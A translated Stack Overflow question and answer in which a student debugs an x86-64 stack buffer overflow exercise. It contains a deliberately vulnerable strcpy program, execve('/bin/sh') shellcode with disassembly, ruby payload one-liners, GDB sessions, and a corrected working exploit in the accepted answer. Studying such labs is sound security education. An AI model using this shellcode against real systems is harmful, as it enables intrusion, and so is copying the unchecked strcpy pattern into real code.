# Syscall inside shellcode won't run

Tags: c, shell, security, assembly, buffer-overflow

**Note: I've already asked this question in Stackoverflow in Portuguese Language: https://pt.stackoverflow.com/questions/76571/seguran%C3%A7a-syscall-dentro-de-shellcode-n%C3%A3o-executa. But it seems to be a really hard question, so this question is just a translation of the question in portuguese.**

I'm studying Information Security and performing some experiments trying to *exploit* a classic case of buffer overflow.

I've succeeded in the creation of the *shellcode*, its injection inside the vulnerable program and in its execution. My problem is that a syscall to `execve()` to get a shell does not work.

In more details:

This is the code of the vulnerable program (compiled in a Ubuntu 15.04 x88-64, with the following gcc flags: "-fno-stack-protector -z execstack -g" and with the ASLR turned off):

```
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

int do_bof(char *exploit) {
    char buf[128];

    strcpy(buf, exploit);
    return 1;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        puts("Usage: bof <any>");
        return 0;
    }

    do_bof(argv[1]);
    puts("Failed to exploit.");
    return 0;
}
```

This is a small assembly program that spawn a shell and then exits. **Note that this code will work independently. This is: If I assemble, link and run this code alone, it will work.**

```
global _start

section .text
_start:
    jmp short push_shell
starter:
    pop rdi
    mov al, 59
    xor rsi, rsi
    xor rdx, rdx
    xor rcx, rcx
    syscall
    xor al, al
    mov BYTE [rdi], al
    mov al, 60
    syscall
push_shell:
    call starter
shell:
    db  "/bin/sh"
```

This is the output of a **objdump -d -M intel** of the above program, where the shellcode were extracted from (note: the language of the output is portuguese):

```
spawn_shell.o: formato do arquivo elf64-x86-64

Desmontagem da seção .text:

0000000000000000 <_start>:
   0:   eb 16                   jmp    18 <push_shell>

0000000000000002 <starter>:
   2:   5f                      pop    rdi
   3:   b0 3b                   mov    al,0x3b
   5:   48 31 f6                xor    rsi,rsi
   8:   48 31 d2                xor    rdx,rdx
   b:   48 31 c9                xor    rcx,rcx
   e:   0f 05                   syscall 
  10:   30 c0                   xor    al,al
  12:   88 07                   mov    BYTE PTR [rdi],al
  14:   b0 3c                   mov    al,0x3c
  16:   0f 05                   syscall 

0000000000000018 <push_shell>:
  18:   e8 e5 ff ff ff          call   2 <starter>

000000000000001d <shell>:
  1d:   2f                      (bad)  
  1e:   62                      (bad)  
  1f:   69                      .byte 0x69
  20:   6e                      outs   dx,BYTE PTR ds:[rsi]
  21:   2f                      (bad)  
  22:   73 68                   jae    8c <shell+0x6f>
```

This command would be the payload, which inject the shellcode along with the needed nop sleed and the return address that will overwrite the original return address:

```
ruby -e 'print "\x90" * 103 + "\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
```

So far, I've already debugged my program with the shellcode injected very carefully, paying attention to the RIP register seeing where the execution goes wrong. I've discovered that:

- The return address is correctly overwritten and the execution jumps to my shellcode.
- The execution goes alright until the "e:" line of my assembly program, where the syscall to `execve()` happens.
- The syscall simply does not work, even with the register correctly set up to do a syscall. Strangely, after this line, the RAX and RCX register bits are all set up.

The result is that the execution goes to the non-conditional jump that pushes the address of the shell again and a infinity loop starts until the program crash in a SEGFAULT.

That's the main problem: The syscall won't work.

Some notes:

- Some would say that my "/bin/sh" strings needs to be null terminated. Well, it does not seem to be necessary, nasm seems to put a null byte implicitly, and my assembly program works, as I stated.
- Remember it's a 64 bit shellcode.
- This shellcode works in the following code:

  ```
  char shellcode[] = "\xeb\x0b\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

  int main() {
      void (*func)();
      func = (void (*)()) shellcode;
      (void)(func)();
  }
  ```

What's wrong with my shellcode?

**EDIT 1:**

Thanks to the answer of Jester, the first problem was solved. Additionaly, I discovered that a shellcode has not the requirement of work alone. The new Assembly code for the shellcode is:

```
spawn_shell: formato do arquivo elf64-x86-64


Desmontagem da seção .text:

0000000000400080 <_start>:
  400080:   eb 1e                   jmp    4000a0 <push_shell>

0000000000400082 <starter>:
  400082:   5f                      pop    %rdi
  400083:   48 31 c0                xor    %rax,%rax
  400086:   88 47 07                mov    %al,0x7(%rdi)
  400089:   b0 3b                   mov    $0x3b,%al
  40008b:   48 31 f6                xor    %rsi,%rsi
  40008e:   48 31 d2                xor    %rdx,%rdx
  400091:   48 31 c9                xor    %rcx,%rcx
  400094:   0f 05                   syscall 
  400096:   48 31 c0                xor    %rax,%rax
  400099:   48 31 ff                xor    %rdi,%rdi
  40009c:   b0 3c                   mov    $0x3c,%al
  40009e:   0f 05                   syscall 

00000000004000a0 <push_shell>:
  4000a0:   e8 dd ff ff ff          callq  400082 <starter>
  4000a5:   2f                      (bad)  
  4000a6:   62                      (bad)  
  4000a7:   69                      .byte 0x69
  4000a8:   6e                      outsb  %ds:(%rsi),(%dx)
  4000a9:   2f                      (bad)  
  4000aa:   73 68                   jae    400114 <push_shell+0x74>
```

If I assemble and link it, it will not work, but if a inject this in another program as a payload, it will! Why? Because if I run this program alone, it will try to terminate an already NULL terminated string "/bin/sh". The OS seems to do an initial setup even for assembly programs. But this is not true if I inject the shellcode, and more: The real reason of my syscall didn't have succeeded is that the "/bin/sh" string was not NULL terminated in runtime, but it worked as a standalone program because in this case, it was NULL terminated.

Therefore, you shellcode run alright as a standalone program is not a proof that it works.

The exploitation was successfull... At least in GDB. Now I have a new problem: The exploit works inside GDB, but doesn't outside it.

```
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\ x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 13952 está executando novo programa: /bin/dash
$ ls
bof    bof2.c  bof3_env      bof3_new_shellcode.txt bof3_shellcode.txt  get_shell     shellcode_exit    shellcode_hello.c  shellcode_shell2
bof.c  bof3    bof3_env.c    bof3_non_dbg        func_stack      get_shell.c      shellcode_exit.c  shellcode_shell    shellcode_shell2.c
bof2   bof3.c  bof3_gdb_env  bof3_run_env        func_stack.c    shellcode_bof.c  shellcode_hello   shellcode_shell.c
$ exit
[Inferior 1 (process 13952) exited normally]
(gdb)
```

And outside:

```
$ ./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
fish: Job 1, “./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')” terminated by signal SIGSEGV (Address boundary error)
```

Immediately I searched about it and found this question: [Buffer overflow works in gdb but not without it](https://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it)

Initially I thought it was just matter of unset two environment variables and discover a new return address, but unset two variables had not made the minimal difference:

```
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) unset env COLUMNS
(gdb) unset env LINES
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 14670 está executando novo programa: /bin/dash
$
```

So now, this is the second question: Why the exploit works inside GDB but does not outside it?

Comment: At a guess `strcpy` only copies to the first 0 byte. So if the exploit contains any 0s then you're only copying the part of the exploit before the first 0.

Comment: @John3136 as you can see, it doesn't.

Answer (score 3, accepted):

The problem is the `mov al,0x3b`. You forgot to zero the top bits, so if they are not zero already, you will not be performing an `execve` syscall but something else. Simple debugging should have pointed this out to you. The solution is trivial: just insert `xor eax, eax` before that. Furthermore, since you append the return address to your exploit, the string will no longer be zero terminated. It's also easy to fix, by storing a zero there at runtime using for example `mov [rdi + 7], al` just after you have cleared `eax`.

The full exploit could look like:

`ruby -e 'print "\x90" * 98 + "\xeb\x18\x5f\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'`

The initial part corresponds to:

```
    jmp short push_shell
starter:
    pop rdi
    xor eax, eax
    mov [rdi + 7], al
    mov al, 59
```

Note that due to the code size change, the offset for the `jmp` and the `call` at the end had to be changed as well, and the number of `nop` instructions too.

The above code (with the return address adjusted for my system) works fine here.

Comment: Ok, ok... You shellcode worked and I remade my shellcode to it works. However, an even stranger problem raised: The exploit works inside GDB, but does not work with the program as a standalone. =D

Comment: Slightly different memory layout when standalone. If you use the correct address it works in standalone too.